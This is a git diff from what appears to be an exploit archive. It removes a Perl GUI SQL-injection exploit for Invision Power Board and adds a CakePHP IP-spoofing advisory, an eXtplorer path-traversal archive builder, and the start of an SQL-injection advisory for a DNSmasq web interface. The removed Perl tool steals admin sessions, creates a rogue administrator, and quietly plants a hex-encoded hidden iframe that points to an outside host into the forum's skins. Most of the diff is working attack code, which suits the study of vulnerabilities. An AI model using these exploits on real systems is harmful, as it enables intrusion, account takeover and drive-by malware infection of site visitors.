& Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 +39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0 +39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 +39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 +39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0 +39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0 +39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0 +39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 +39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0 diff --git a/platforms/lin_x86-64/shellcode/39151..c b/platforms/lin_x86-64/shellcode/39151.c similarity index 100% rename from platforms/lin_x86-64/shellcode/39151..c rename to platforms/lin_x86-64/shellcode/39151.c diff --git a/platforms/linux/shellcode/39152..c b/platforms/linux/shellcode/39152.c similarity index 100% rename from platforms/linux/shellcode/39152..c rename to platforms/linux/shellcode/39152.c diff --git a/platforms/multiple/webapps/31329..txt b/platforms/multiple/webapps/31329.txt similarity index 100% rename from platforms/multiple/webapps/31329..txt rename to platforms/multiple/webapps/31329.txt diff --git a/platforms/php/webapps/28221.pl b/platforms/php/webapps/28221.pl deleted file mode 100755 index adcf50ecc..000000000 --- a/platforms/php/webapps/28221.pl +++ /dev/null @@ -1,390 +0,0 @@ -source: http://www.securityfocus.com/bid/18984/info - -Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. - -A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. - -#!/usr/bin/perl - -## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC -## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41 -## http://rst.void.ru/papers/advisory41.txt -## tested on 2.1.3, 2.1.6 -## -## 08.06.06 -## (c)oded by 1dt.w0lf -## RST/GHC -## http://rst.void.ru -## http://ghc.ru - -use Tk; -use Tk::BrowseEntry; -use Tk::DialogBox; -use LWP::UserAgent; - -$mw = new MainWindow(title => "r57ipb216gui" ); - -$mw->geometry ( '420x550' ) ; -$mw->resizable(0,0); - -$mw->Label(-text => '!', -font => '{Webdings} 22')->pack(); -$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); -$mw->Label(-text => '')->pack(); - -$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; -$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; - -$url = 'http://server/forum/index.php'; -$user_id = '1'; -$prefix = 'ibf_'; -$table = 'members'; -$column = 'member_login_key'; -$new_admin_name = 'rstghc'; -$new_admin_password = 'rstghc'; -$new_admin_email = 'billy@microsoft.com'; -$report = ''; -$group = 4; -$curr_user = 0; -$rand_session = &session(); -$use_custom_fields = 0; -$custom_fields = 'name1=value1,name2=value2'; - -$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fright->Label( -text => ' ')->pack(); -$fleft->Label( -text => ' ')->pack(); - -$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Label( -text => ' ')->pack(); - -$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$b2 = $fright->BrowseEntry( -command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8'); -$b2->insert("end", "members"); -$b2->insert("end", "members_converge"); -$b2->pack( -side => "top" , -anchor => 'w'); - -$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$b = $fright->BrowseEntry( -relief => "groove", -variable => \$column, -font => '{Verdana} 8'); -$b->insert("end", "member_login_key"); -$b->insert("end", "name"); -$b->insert("end", "ip_address"); -$b->insert("end", "legacy_password"); -$b->insert("end", "email"); -$b->pack( -side => "top" , -anchor => 'w' ); - -$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Label( -text => ' ')->pack(); - -$fleft->Label ( -text => ' ')->pack(); - -$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top" , -anchor => 'w'); - -$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fleft->Label ( -text => ' ')->pack(); -$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top" , -anchor => 'w'); - -$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; -$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ; - -$fright->Label( -text => ' ')->pack(); - -$fright->Button(-text => 'Test forum vulnerability', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&test_vuln - )->pack(); - -$fright->Button(-text => 'Get database tables prefix', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&get_prefix - )->pack(); - -$fright->Button(-text => 'Get data from database', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&get_data - )->pack(); - -$fright->Button(-text => 'Get admin session', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&get_admin - )->pack(); - -$fright->Button(-text => 'Create new admin', - -relief => "groove", - -width => '30', - -font => '{Verdana} 8 bold', - -activeforeground => 'red', - -command => \&create_admin - )->pack(); - - - -$fleft->Label( -text => ' ')->pack(); -$fleft->Label( -text => ' ')->pack(); -$fleft->Label( -text => ' ')->pack(); -$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack(); -$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack(); -$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack(); -$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack(); - -MainLoop(); - -sub update_columns() - { - $b->delete(0,"end"); - if($table eq 'members'){ - $column = "member_login_key"; - $b->insert("end", "member_login_key"); - $b->insert("end", "name"); - $b->insert("end", "ip_address"); - $b->insert("end", "legacy_password"); - $b->insert("end", "email"); - } elsif($table eq 'members_converge'){ - $column = "converge_pass_hash"; - $b->insert("end", "converge_pass_hash"); - $b->insert("end", "converge_pass_salt"); - $b->insert("end", "converge_email"); - } - } - -sub get_admin() - { - $xpl = LWP::UserAgent->new( ) or die; - $InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]); - if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; } - else { $sql = ''; } - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*"); - $error = 0; - $rep = ''; - if($res->is_success) - { - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } - if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; } - else { $error = 1; } - if(!$error) - { - $rep = ''; - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*"); - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; } - else { $error = 1; } - if(!$error){ - if($curr_user != 1) - { - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*"); - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; } - } - else - { - $session_user_id = $user_id; - } - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; } - $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*"); - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; } - } - $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack; - $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack; - $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack; - $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack; - $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack; - $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } - } - else - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } - if($error) - { - $InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } - } - -sub get_data() -{ -$xpl = LWP::UserAgent->new( ) or die; -$InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]); -if($table eq 'members') { $id_text = 'id'; } -if($table eq 'members_converge') { $id_text = 'converge_id'; } - -$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*"); -if($res->is_success) - { - $rep = ''; - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report = $3; } - else - { - $InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } - } -else - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; - $InfoWindow->Show(); - $InfoWindow->destroy; - } -} - -sub create_admin() - { - $InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]); - if($session_id eq '' || $session_ip_address eq '') - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack; - } - elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack; - } - else - { - $xpl = LWP::UserAgent->new( ) or die; - ($url2 = $url) =~ s/index.php/admin.php/; - $cf = ''; - %fields = ( - 'code' => 'doadd', - 'act' => 'mem', - 'section' => 'content', - 'name' => $new_admin_name, - 'password' => $new_admin_password, - 'email' => $new_admin_email, - 'mgroup' => $group, - ); - if($use_custom_fields) - { - @cf = split(',',$custom_fields); - foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;} - } - - $res = $xpl->post($url2."?adsess=$session_id", - [ - %fields, - ], - 'USER_AGENT'=>'', - 'CLIENT_IP'=>"$session_ip_address", - 'X_FORWARDED_FOR'=>"$session_ip_address"); - $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E'; - $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")"; - $res = $xpl->post($url2."?adsess=$session_id", - [ - 'code' => 'runsql', - 'act' => 'sql', - 'section' => 'admin', - 'query' => $query, - ], - 'USER_AGENT'=>'', - 'CLIENT_IP'=>"$session_ip_address", - 'X_FORWARDED_FOR'=>"$session_ip_address"); - $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; - $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack; - } - $InfoWindow->Show(); - $InfoWindow->destroy; - } - -sub test_vuln() -{ -$InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]); -$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; -$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; -$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; -$xpl = LWP::UserAgent->new( ) or die; -$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*"); -if($res->is_success) - { - $rep = ''; - if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } - if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } - else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; } - } -else - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; - } -$InfoWindow->Show(); -$InfoWindow->destroy; -} - - -sub get_prefix() -{ -$InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]); -$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; -$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; -$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; -$xpl = LWP::UserAgent->new( ) or die; -$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'"); -if($res->is_success) - { - $rep = ''; - if($res->as_string =~ /FROM (.*)sessions/) - { - $prefix = $1; - $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack; - } - else - { - $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } - } -else - { - $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; - $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; - } -$InfoWindow->Show(); -$InfoWindow->destroy; -} - -sub session() - { - return 'r57ipb216_for_IDS'; - } \ No newline at end of file diff --git a/platforms/php/webapps/39813.txt b/platforms/php/webapps/39813.txt new file mode 100755 index 000000000..6ffaf26ac --- /dev/null +++ b/platforms/php/webapps/39813.txt @@ -0,0 +1,284 @@ +============================================= +- Release date: 12.05.2016 +- Discovered by: Dawid Golunski +- Severity: Medium +============================================= + + +I. VULNERABILITY +------------------------- + +CakePHP Framework <= 3.2.4 IP Spoofing Vulnerability + 3.1.11 + 2.8.1 + 2.7.10 + 2.6.12 + +II. BACKGROUND +------------------------- + +- CakePHP Framework + +http://cakephp.org/ + +"CakePHP makes building web applications simpler, faster and require less code. + +CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer +and a powerful scaffolding system that makes building both small and complex +systems a breeze. " + + +III. INTRODUCTION +------------------------- + +CakePHP Framework contains a vulnerability that allows to spoof the source IP +address. This can allow to bypass access control lists, or injection of +malicious data which, if treated as sanitized by an unaware CakePHP-based +application, can lead to other vulnerabilities such as SQL injection, XSS, +command injection etc. + + +IV. DESCRIPTION +------------------------- + +Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that +allows to obtain the IP address of a client accessing a CakePHP-based +application. The is slightly different in each branch: + +CakePHP 2.x: + +------[ Cake/Network/CakeRequest.php ]------ + + public function clientIp($safe = true) { + if (!$safe && env('HTTP_X_FORWARDED_FOR')) { + $ipaddr = preg_replace('/(?:,.*)/', '', env('HTTP_X_FORWARDED_FOR')); + } else { + if (env('HTTP_CLIENT_IP')) { + $ipaddr = env('HTTP_CLIENT_IP'); + } else { + $ipaddr = env('REMOTE_ADDR'); + } + } + + if (env('HTTP_CLIENTADDRESS')) { + $tmpipaddr = env('HTTP_CLIENTADDRESS'); + + if (!empty($tmpipaddr)) { + $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr); + } + } + return trim($ipaddr); + } + +-------------------------------------------- + + +CakePHP 3.x: + +------[ cakephp/src/Network/Request.php ]------ + + /** + * Get the IP the client is using, or says they are using. + * + * @return string The client IP. + */ + public function clientIp() + { + if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) { + $ipaddr = preg_replace('/(?:,.*)/', '', $this->env('HTTP_X_FORWARDED_FOR')); + } else { + if ($this->env('HTTP_CLIENT_IP')) { + $ipaddr = $this->env('HTTP_CLIENT_IP'); + } else { + $ipaddr = $this->env('REMOTE_ADDR'); + } + } + + if ($this->env('HTTP_CLIENTADDRESS')) { + $tmpipaddr = $this->env('HTTP_CLIENTADDRESS'); + + if (!empty($tmpipaddr)) { + $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr); + } + } + return trim($ipaddr); + } + +-------------------------------------------- + + +Both of the methods contain the same vulnerability. Despite the safe flag +(CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they +both use HTTP_CLIENT_IP request header (if it exists) instead of the +REMOTE_ADDR variable set by the web server. + +The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header +in a HTTP request. + + +V. PROOF OF CONCEPT EXPLOIT +------------------------- + + +A) Simple PoC + +Download a vulnerable version of CakePHP framework and edit +src/Template/Pages/home.ctp to include the PoC code below +which echoes the visitor's IP using the clientIp() method: + + +-------[ src/Template/Pages/home.ctp ]-------- + +layout = false; + +if (!Configure::read('debug')): + throw new NotFoundException(); +endif; + +$cakeDescription = 'CakePHP: the rapid development php framework'; + +echo "PoC \n
Your IP is: [". $this->request->clientIp() ."]\n\n

"; + +[...] + +?> + +---------------------------------------------- + + +If we send the following request with CLIENT-IP header containing an arbitrary +IP and malicious XSS data: + + +GET /cake/cake3/ HTTP/1.1 +Host: centos +CLIENT-IP: 100.200.300.400 +Content-Length: 2 + + +the application will give the following response: + + +HTTP/1.1 200 OK +Content-Type: text/html; charset=UTF-8 + +PoC +
Your IP is: [100.200.300.400 ] + +[...] + + +As we can see the clientIp() method returns the fake IP and XSS payload +from CLIENT-IP header. + + +B) Croogo CMS exploit + +An example application vulnerable to this bug is Croogo CMS: + +https://croogo.org/ + +"Croogo is a free, open source, content management system for PHP, +released under The MIT License. It is powered by CakePHP MVC framework. +It was first released on October 07, 2009" + +In one of its scripts we can find the isWhitelistedRequest() which +takes care of ACLs: + + +-------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]-------- + + +/** + * Check wether request is from a whitelisted IP address + * + * @see CakeRequest::addDetector() + * @param $request CakeRequest Request object + * @return boolean True when request is from a whitelisted IP Address + */ + public static function isWhitelistedRequest(CakeRequest $request) { + if (!$request) { + return false; + } + $clientIp = $request->clientIp(); + $whitelist = array_map( + 'trim', + (array)explode(',', Configure::read('Site.ipWhitelist')) + ); + return in_array($clientIp, $whitelist); + } + +------------------------------------------------------------------- + +As we can see, it uses the affected clientIp() function from CakePHP framework. + + +VI. BUSINESS IMPACT +------------------------- + +This vulnerability could be used to bypass access control lists to get +access to sensitive data, or lead to higher severity vulnerabilities +if untrusted data returned by clientIp() method is treated as safe and used +without appropriate sanitization within SQL queries, system command calls etc. + +VII. SYSTEMS AFFECTED +------------------------- + +According to the vendor, the following versions of CakePHP framework should be +affected by this issue. + +3.1.11 +3.2.4 +2.8.1 +2.7.10 +2.6.12 + + +VIII. SOLUTION +------------------------- + +The vendor has released patched versions. +Install the latest version from the link below. + +IX. REFERENCES +------------------------- + +http://legalhackers.com + +http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt + +Vendor security CakePHP releases: +http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html + +http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers + + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +http://legalhackers.com + +XI. REVISION HISTORY +------------------------- + +12.05.2016 - Final advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. + diff --git a/platforms/php/webapps/39816.php b/platforms/php/webapps/39816.php new file mode 100755 index 000000000..7ff2ff4b2 --- /dev/null +++ b/platforms/php/webapps/39816.php @@ -0,0 +1,134 @@ +/* +[+] Credits: John Page aka hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt +[+] ISR: apparitionsec + +Vendor: +============== +extplorer.net + +Product: +================== +eXtplorer v2.1.9 + +eXtplorer is a PHP and Javascript-based File Manager, it allows to browse +directories, edit, copy, move, delete, +search, upload and download files, create & extract archives, create new +files and directories, change file +permissions (chmod) and more. It is often used as FTP extension for popular +applications like Joomla. + +Vulnerability Type: +====================== +Archive Path Traversal + +CVE Reference: +============== +CVE-2016-4313 + +Vulnerability Details: +===================== + +eXtplorer unzip/extract feature allows for path traversal as decompressed +files can be placed outside of the intended target directory, +if the archive content contains "../" characters. This can result in files +like ".htaccess" being overwritten or RCE / back door +exploits. + + +Tested on Windows + + +Reproduction steps: +================== + +1) Generate an archive using below PHP script +2) Upload it to eXtplorer and then extract it +3) Check directory for the default 'RCE.php' file or use CL switch to +overwrite files like .htaccess + + +Exploit code(s): +=============== + +Run below PHP script from CL... + +[evil-archive.php] +*/ + +, , ";exit();} +$zipname=$argv[1]; +$exploit_file="RCE.php"; +$cmd=''; +if(!empty($argv[2])&&is_numeric($argv[2])){ +$depth=$argv[2]; +}else{ +echo "Second flag must be numeric!, you supplied '$argv[2]'"; +exit(); +} +if(strtolower($argv[3])!="y"){ +if(!empty($argv[3])){ +$exploit_file=$argv[3]; +} +if(!empty($argv[4])){ +$cmd=$argv[4]; +}else{ +echo "Usage: enter a payload for file $exploit_file wrapped in double +quotes"; +exit(); +} +} +$zip = new ZipArchive(); +$res = $zip->open("$zipname.zip", ZipArchive::CREATE); +$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd); +$zip->close(); +echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n"; +echo "================ by hyp3rlinx ==================="; +?> + +/* +/////////////////////////////////////////////////////////////////////// + +[Script examples] + +Use default RCE.php by passing "y" flag creating DOOM.zip with path depth +of 2 levels +c:\>php evil-archive.php DOOM 2 Y + + +Create DOOM.zip with path depth of 4 levels and .htaccess file to overwrite +one on the system. +c:\>php evil-archive.php DOOM 4 .htaccess "allow from all" + + +Disclosure Timeline: +=================================== +Vendor Notification: No reply +May 14, 2016 : Public Disclosure + +Exploitation Method: +====================== +Local + +Severity Level: +================ +Medium 6.3 +CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. + +hyp3rlinx +*/ \ No newline at end of file diff --git a/platforms/php/webapps/39817.php b/platforms/php/webapps/39817.php new file mode 100755 index 000000000..2c283d1c1 --- /dev/null +++ b/platforms/php/webapps/39817.php @@ -0,0 +1,150 @@ +/* +[+] Credits: hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt +[+] ISR: apparitionsec + +Vendor: +==================== +tmcdos / sourceforge + +Product: +====================== +dns_dhcp Web Interface + +Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory + +This is a very simple web interface for management of static DHCP leases in +DNSmasq and Mikrotik. +It generates config files for DNSmasq and uses RouterOS API to manage +Mikrotik. Network devices (usually PCs) +are separated into subnets by department and use triplets (hostname, MAC +address, IP address) for identification. +Information is stored in MySQL. + +Vulnerability Type: +=================== +SQL Injection + +CVE Reference: +============== +N/A + +Vulnerability Details: +===================== + +The 'net' HTTP form POST parameter to dns.php script is not +checked/santized and is used directly in MySQL query allowing +attacker to easily exfiltrate any data from the backend database by using +SQL Injection exploits. + +1) On line 239 of dns.php +$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b); + +2) +dns.php line 187 the a_select function where 2nd argument $_REQUEST['net'] +is passed to an concatenated to query ($clause) +and executed on line 194 mysql_query($query). + +function a_select($tbl,$clause,$field='',$where='') +{ +if ($clause==0) return ' '; +if($field=='') $field=$tbl; +$query = "SELECT $field 